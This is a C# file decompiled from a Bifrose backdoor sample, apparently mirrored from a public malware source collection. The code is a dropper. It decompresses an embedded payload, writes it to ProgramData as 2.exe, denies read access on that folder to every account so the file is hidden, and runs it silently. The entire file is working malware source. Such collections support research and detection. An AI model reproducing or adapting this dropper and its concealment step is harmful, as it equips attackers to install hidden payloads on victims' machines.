mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-02-01 06:47:28 +00:00
93 lines
2.9 KiB
C#
93 lines
2.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: X
|
|||
|
|
// Assembly: تمويه, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 76455843-6727-42BB-8FC2-E9F414E4C091
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Bifrose.fsi-90ef09667cebbff320fddbf9e767a1c73c3b725572223c760d4d8d4ec8ce1ab1.exe
|
|||
|
|
|
|||
|
|
using Microsoft.VisualBasic;
|
|||
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
|
using System;
|
|||
|
|
using System.Collections;
|
|||
|
|
using System.IO;
|
|||
|
|
using System.IO.Compression;
|
|||
|
|
using System.Reflection;
|
|||
|
|
using System.Resources;
|
|||
|
|
using System.Security.AccessControl;
|
|||
|
|
using System.Security.Principal;
|
|||
|
|
|
|||
|
|
internal class X
|
|||
|
|
{
|
|||
|
|
[STAThread]
|
|||
|
|
public static void main()
|
|||
|
|
{
|
|||
|
|
byte[] bytes = X.Z(X.Z((byte[]) new ResourceManager("M", Assembly.GetExecutingAssembly()).GetObject("A")));
|
|||
|
|
string Path = Interaction.Environ("programdata") + "\\2";
|
|||
|
|
string str = Path + "\\2.exe";
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
FileSystem.MkDir(Path);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
X.BD(ref Path);
|
|||
|
|
File.WriteAllBytes(str, bytes);
|
|||
|
|
Interaction.Shell(str);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static byte[] Z(byte[] Byt)
|
|||
|
|
{
|
|||
|
|
MemoryStream memoryStream = new MemoryStream(Byt);
|
|||
|
|
GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Decompress);
|
|||
|
|
byte[] buffer = new byte[4];
|
|||
|
|
memoryStream.Position = checked (memoryStream.Length - 5L);
|
|||
|
|
memoryStream.Read(buffer, 0, 4);
|
|||
|
|
int int32 = BitConverter.ToInt32(buffer, 0);
|
|||
|
|
memoryStream.Position = 0L;
|
|||
|
|
byte[] array = new byte[checked (int32 - 1 + 1)];
|
|||
|
|
gzipStream.Read(array, 0, int32);
|
|||
|
|
gzipStream.Dispose();
|
|||
|
|
memoryStream.Dispose();
|
|||
|
|
return array;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static void BD(ref string Path)
|
|||
|
|
{
|
|||
|
|
DirectorySecurity accessControl1 = Directory.GetAccessControl(Path, AccessControlSections.All);
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
foreach (FileSystemAccessRule accessRule in (ReadOnlyCollectionBase) accessControl1.GetAccessRules(true, true, typeof (NTAccount)))
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
DirectorySecurity accessControl2 = Directory.GetAccessControl(Path, AccessControlSections.All);
|
|||
|
|
FileSystemAccessRule rule = new FileSystemAccessRule((IdentityReference) new NTAccount(Strings.Split(accessRule.IdentityReference.Value, "\\")[1]), FileSystemRights.ReadData, AccessControlType.Deny);
|
|||
|
|
accessControl2.AddAccessRule(rule);
|
|||
|
|
Directory.SetAccessControl(Path, accessControl2);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
finally
|
|||
|
|
{
|
|||
|
|
IEnumerator enumerator;
|
|||
|
|
if (enumerator is IDisposable)
|
|||
|
|
(enumerator as IDisposable).Dispose();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|